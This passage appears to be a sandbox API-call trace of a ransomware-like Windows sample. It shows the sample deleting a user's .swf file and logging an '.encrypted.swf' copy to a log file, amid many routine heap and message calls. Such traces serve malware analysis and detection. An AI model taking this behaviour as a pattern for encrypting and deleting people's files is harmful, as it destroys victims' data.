hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.013] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.014] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.014] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.014] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\5o5ipnmm_es0x.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0031.016] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.016] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.016] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.016] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.016] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.016] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.016] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.016] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.016] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.016] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.016] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.017] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.017] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.017] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.017] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.017] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.017] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.017] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.017] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.017] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.017] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", lpFilePart=0x0) returned 0x4f [0031.017] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ccfb10, ftCreationTime.dwHighDateTime=0x1d5bf26, ftLastAccessTime.dwLowDateTime=0xa6e56f60, ftLastAccessTime.dwHighDateTime=0x1d5ba03, ftLastWriteTime.dwLowDateTime=0x125e6c20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xc19f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="5o5iPNmM_ES0x.swf", cAlternateFileName="5O5IPN~1.SWF")) returned 0x7c2240 [0031.017] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\5o5ipnmm_es0x.swf")) returned 1 [0031.018] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ccfb10, ftCreationTime.dwHighDateTime=0x1d5bf26, ftLastAccessTime.dwLowDateTime=0xa6e56f60, ftLastAccessTime.dwHighDateTime=0x1d5ba03, ftLastWriteTime.dwLowDateTime=0x125e6c20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xc19f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="5o5iPNmM_ES0x.swf", cAlternateFileName="5O5IPN~1.SWF")) returned 0 [0031.019] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.023] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.024] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.024] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.024] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.024] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.024] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.024] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.024] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.025] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.025] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.025] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.025] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.025] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.025] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x63e, lpOverlapped=0x0) returned 1 [0031.025] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.025] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x63e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.025] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.encrypted.swf\r\n", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0031.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5c) returned 0x87aa40 [0031.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.encrypted.swf\r\n", cchWideChar=92, lpMultiByteStr=0x87aa40, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.encrypted.swf\r\n", lpUsedDefaultChar=0x0) returned 92 [0031.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0031.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0031.026] WriteFile (in: hFile=0x128, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x5b, lpOverlapped=0x0) returned 1 [0031.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0031.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.026] CloseHandle (hObject=0x128) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.027] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.027] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.028] HeapFree (in: hHeap=0x770000, 